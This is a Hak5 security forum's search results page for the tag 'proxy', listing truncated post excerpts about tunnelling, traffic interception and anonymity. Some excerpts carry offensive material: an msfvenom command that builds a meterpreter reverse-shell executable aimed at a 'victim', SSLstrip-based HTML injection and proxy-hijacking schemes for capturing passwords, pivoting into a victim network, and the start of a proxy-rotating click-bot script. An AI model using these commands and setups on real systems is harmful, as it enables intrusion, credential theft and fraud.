Jump to content

Search the Community

Showing results for tags 'proxy'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 25 results

  1. i'm brazilian and i'm wanting to go deep weeb through tor and the college network blocks could someone help me? thank you very much thank you
  2. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumv
  3. I want to use Charles/Fiddler to capture HTTPS traffic from application. After installing trusted root certificate I've noticed that not every application will accept it. For example, I can intercept all requests made by Chrome, but on Firefox I need to add trusted certificate. When capturing traffic for Java application, certificate need to be added to JVM TrustStore, and in case of using Python script we need to add line of code that use exported certificate. How can I analyze requests made by some software that support proxy (so reverse proxy can be easily used), but
  4. In the process of setting up 2 machines for my little ones and I want to make sure they don't "accidentally" stumble upon something they shouldn't. I have parental controls and content filtering inside the router which works well, but I'm wanting to have a separate network for just the kids and I want everything on that network to be restricted to appropriate content only. Should I setup a proxy and point their browser's to route traffic through a proxy, is there a web filter app/server software you recommend? OpenDNS works well, but if I remember right I was able to somewhat view content th
  5. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handl
  6. I need help, i received an assignment to complete security testing on "Windows Desktop application" I verified the file level of security and binary code review but i want to do interception of request and response but am literally struck, in google found some tools like Echo-mirage and Wireshark - While attaching echo-mirage tool to my desktop application it showing message like "A Problem caused the program to stop working correctly windows will close the program and notify you if a solution is available." - Whireshark : am not getting proper idea on
  7. it´s possible to make a middle man attack in our proxy, i mean, i want to make a proxy server on a raspberry pi 3, and get all data (like wireshark when sniffs), incluying https requests. my second question is, how to make the data get in my server (the rpi) without configuring the modem and the dmz, something like redirect the request with a external server and a client on the pi. my internet company change mi modem recently, and even so when i configure the dmz on it, and the portforwarding, the external connections don't get in, im looking for a alternative. (again, sorry for my b
  8. Hi Everyone! I am trying to achieve this scenario : connect client to management AP, gets IP address from pineapple. PC on same pine network has same subnet address of I want to be able to forward all traffic from the client device onto the PC which is running burpsuite. I have tried almost every thread that i can find and whatever i do i cannot get this traffic from the device through burpsuite. is it actually possible to do this? as in a client connects to the pineapple network and then the traffic is passed through to burpsuite? My set up in bur
  9. Saw a talk online at DefCon where someone had created a proxy server setup inject a hook into the js files a bit like Beef in kali combined with SSL stripping and MITM to grab passwords etc and thought this may be able to be used with the ducky by plugging into a computer and it automatically setting up a connection to your proxy server! For example, in Windows 10 you could use Win-Key + I to open setting and start typing proxy and hit enter to open up the right page then using tab to scroll down, then use up key to turn proxy on and keep doing the and enter the correct setup for your server
  10. Looks like a new release will be coming out soon, but even more exciting is the MITMf integration that is on the cards (Unless this is going to be in the next release!). MITMf will replace some of the infusions we have come to love and hate, and replace them with a one stop shop framework. This will hopefully solve some of the issues we were having running multiple infusions impacting the network. Now we will have the best of hardware and software MITM in one sweet pineapple! Some functionality may not make it due to being CPU intensive (FilePwn), regardless, this is going to be a giant leap!
  11. Hello, i would like to achieve a high level of anonymity in web-based applications(mainly browser) and would like to get some input by experienced users! The Goal is to not be tracable(as good as this is possible) and to have encryption aswell. First i thought of chaining a list of Proxies(at best in a random order for each package sent)before entering an SSL encrypted VPN. Through that i hope to prevent danger from sniffing into my traffic from the proxies due the encryption of the vpn and the different routes through the proxies hide my Identity from the vpn. Does this work? I am not sur
  12. I wanted to proxify firefox on Ubuntu 15 I tried a couple of different methods. I remember it used to be just pop open firefox and manually enter the proxy IP and port in the network preferences. But it just doesn't work. I tried editing /etc/environment but no dice. Is there is a prefered method? Which configuration files or whatnot do I have to edit?
  13. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-sock
  14. I reading up on this JS Browser. I'm thinking to myself it's javascript so you could embed it into a webpage and visit it remotely. It would make proxying pretty easy. I'm thinking someone will come up with a way to exploit a client and use their browser as a proxy pretty quickly. Here's the source code: https://github.com/MicrosoftEdge/JSBrowser/ I don't have a lot of time to explore this as I'm in the midst of some other work. But I thought I would go ahead and share the source code.
  15. This looks very promising as a replacement for what ProxyHam was supposed to be. http://samy.pl/proxygambit/ he uses 2G gsm connect so theoretically you can connect from anywhere in the world.
  16. I'm trying to get Burpsuite integrated with PineAP on a PineappleV... is it possible? Here is my setup: - Wireless router at ( for connection to the internet - PineappleV running PineAP ( + - From the same wifi router, I have a Kali Linux machine at ( listening on port 8080/tcp running Burpsuite My goal is to accept wifi clients connected from PineAP and route any web requests (HTTP/HTTPS) to (Burpsuite). Anyone know how to do this? Can I just create an iptables pre-routing rule to forward to this IP/port?
  17. Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits: Strip SSL from sessions before injecting code which allows for a larger attack surface. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view. The attacks that can be implemented from this are endl
  18. I'd like to send all http traffic from Pineapple clients through Burp Proxy. Here is my setup: I have a Kali Linux box is providing internet to the Pineapple via ethernet using the wp5.sh script. At this point Pineapple clients are able to internet access just fine. I start Burp and it's listening on all interfaces on port 8080 in invisible mode. I think I should be able to send all of the Pineapple traffic through Burp using iptables, but I am not sure how to do so. I thought running the following on the Kali box would do it: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j R
  19. New here, I just got my Mark V, and discovered I understood the AutoSSH thing wrong. The purpose of buying the Wifi Pineapple was actually the opposite of its existence. I want to use it to create a private network wherever I am, and let the box connect to a public AP or mobile phone, while tunneling all traffic through an SSH (or VPN) tunnel to my home server, so the AP only sees one outgoing SSH. And so I discovered that this isn't provided out of the box and I couldn't find any topic on it. Given a few pointers I probably might come up with an infusion that adds this cool feature to the
  20. Hey everyone I need serious help with that What I'm looking for : i want to all advance hidden anonymity options in backtrack ("hide my privacy 99%") So What are their? I have some options about that. > spoof mac > spoof ip > spoof ttl values > spoof http header > spoof dhcp > use live cd > use rdp > use proxy exactly I want to more hidden method to hide my id. (out of my list) anyone help me? I always searching about that. now i am really tired. I'm not a very good English writer : help me...
  21. I'm attempting to create a mod for a game. My console requests a file from an online server and caches it. After it's cached it doesn't bother loading it again. Originally this mod was done by blocking requests to the server and redirecting it to a local server where the modified file was hosted. Now if you block the server it is unable to connect to another URL on the same server that verifies you don't have it blocked. In all I have to find a way to block a specific request for a URL (e.g http://test.site.com/file.extz) and allow others to connect to the internet. I know this should be very
  22. Tested oN Linux Mint WIth Pyhton Version 2.6.6 This Bot Coded by jimyromantic devilz for PTC and I Recode for visit web #!/usr/bin/python # This code is just for educational only ;) # coder by jimmyromanticdevil # code for tutorial Python [ Membuat Bot Auto Clicker ] import urllib2 import urllib import sys import time import random import re import os proxylisttext = "proxylist.txt" useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (
  23. I'm running my mk4 (firmware 2.8.0) with my laptop (Ubuntu 12.04), with the laptop on wifi to get internet to the pineapple (pretty standard). I'm running sslstrip and tcpdump on the laptop, rather than the pineapple. I've gotten ssh tunneling to work on the laptop, so I can use a friend's router as a socks proxy for web browsing, but I can't figure out how to make the pineapple's traffic use that proxy as well. To set up the proxy, I just do "ssh <ip address> -p 443 -D 8080", then use the network settings in Ubuntu to set the SOCKS proxy to Is there any way to make t
  24. Hi, while I was watching the end of your latest web show, I came up with a question, now I can't see this listed under the FAQ, so s0rry if this has already been done. Can the Pineapple be configured in a way, with a second Wifi dongle, to automatically fined and connect to a open hotspot, (also agree to any terms and conditions pages) then connect to a VPN or Proxy. Also disconnect after a set time or data usage and reconnect with a new mac address. All while hosting its open secure Wifi. Its an idea I had.
  25. Hi All, Scenario/Background: I'm on a boat. We use VSAT + two year old Cisco router. Router has been locked down. The only ports open are 80 (http), 443 (https), 25 (mail), 3389 (RDP). When travelling I used to be able to use OpenVPN (udp), PPTP VPN (tcp), or a socksified (-D) SSH connection to tunnel my traffic. That's no longer the case. I borked my VPS server trying to get around the above stated issue. It's left me in a bit of a pickle. I can use TOR to get to my VPS's CPANEL (control panel). I have to use a service like TOR, because the CPANEL is on a non-standard web port (5454). I
  • Create New...